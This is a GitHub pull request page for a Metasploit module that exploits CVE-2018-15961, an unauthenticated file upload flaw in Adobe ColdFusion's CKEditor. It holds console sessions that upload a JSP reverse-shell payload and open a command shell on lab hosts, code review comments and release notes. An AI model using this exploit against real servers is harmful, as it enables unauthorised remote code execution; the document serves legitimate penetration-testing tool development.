New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Coldfusion ckeditor file upload #11206

Merged
merged 6 commits into from Jan 10, 2019

Conversation

Projects
None yet
4 participants
@Qazeer
Copy link
Contributor

Qazeer commented Jan 6, 2019

New pull request from an unique branch (coldfusion_ckeditor_file_upload) as requested.
Integrates RootUp and bcoles' comments from the previous pull request.

--
Hello everyone,

This module exploit the unrestricted file upload flaw in the Adobe ColdFusion CKEditor, affecting ColdFusion 11 (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and ColdFusion 2018 (July 12 release). The vulnerabilty goes by CVE-2018-15961.

The exploitation is pretty basic, a JSP payload is uploaded through a single unauthenticated POST request and executed through a following unauthenticated GET request.

This module was successfully tested against a Linux Adobe ColdFusion 2018 installation using the docker container provided by Adobe (https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0).

Output

msf > use exploit/multi/http/coldfusion_ckeditor_file_upload
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RPORT 8500
RPORT => 8500
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > run

[] Started reverse TCP handler on 172.17.0.1:4444
[] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/LKDZNMPN.jsp...
[+] Upload succeeded! Executing payload...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:38568) at 2019-01-06 05:07:54 +0100

whoami
cfuser

Verification

msfconsole
use exploit/multi/http/coldfusion_ckeditor_file_upload set srvhost
set RHOST
set RPORT
// If necessary
set payload
set LHOST
set LPORT
run

TODO

Should be working on Windows and Adobe 2016 as the URL used do not change but not tested.

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Jan 6, 2019

Please add some module documentation for this module.

'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Platform' => ['win', 'linux'],
'Targets' =>

This comment has been minimized.

@bcoles

bcoles Jan 6, 2019

Contributor

The Java payload is platform agnostic, so you should be able to forgo having separate targets, and instead do this:

          [ 'Java Universal',
            {
                'Arch' => ARCH_JAVA,
                'Platform' => 'java'
            },
          ]

Take a look at grep -rn ".jsp" modules/exploits/multi/ | grep upload for a bunch of examples.

If you want to support multiple targets, take a look at struts_code_exec_exception_delegator or openfire_auth_bypass as examples which supports the above universal target, plus a target for windows and a target for linux. They aren't JSP file upload exploits, but are similar in principle.

@jrobles-r7 jrobles-r7 self-assigned this Jan 9, 2019


res = send_request_cgi(
{
'uri' => normalize_uri(datastore['TARGETURI'], "plugins", "filemanager", "upload.cfm"),

This comment has been minimized.

@acammack-r7

acammack-r7 Jan 9, 2019

Contributor

It looks like there are some leftover tabs in the alignment here. We prefer spaces since they are more reliable between differen't people's code editors.

jrobles-r7 added some commits Jan 10, 2019

@jrobles-r7 jrobles-r7 added docs and removed needs-docs labels Jan 10, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jan 10, 2019

@msjenkins-r7 test this please.

@jrobles-r7 jrobles-r7 merged commit 8ebbd9e into rapid7:master Jan 10, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request Jan 10, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jan 10, 2019

msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142
rhosts => 172.22.222.142
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp...
[+] Upload succeeded! Executing payload...
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.142:43262) at 2019-01-10 06:30:52 -0600

whoami
cfuser
uname -a
Linux 6bd4238e7ffb 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 172.22.222.142 - Command shell session 1 closed.
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) >

msjenkins-r7 added a commit that referenced this pull request Jan 10, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jan 10, 2019

Release Notes

The exploit/multi/http/coldfusion_ckeditor_file_upload module exploits an unauthenticated file upload vulnerability in the CKEditor of Adobe ColdFusion 11 (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and ColdFusion 2018 (July 12 release) to upload and execute JSP files.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment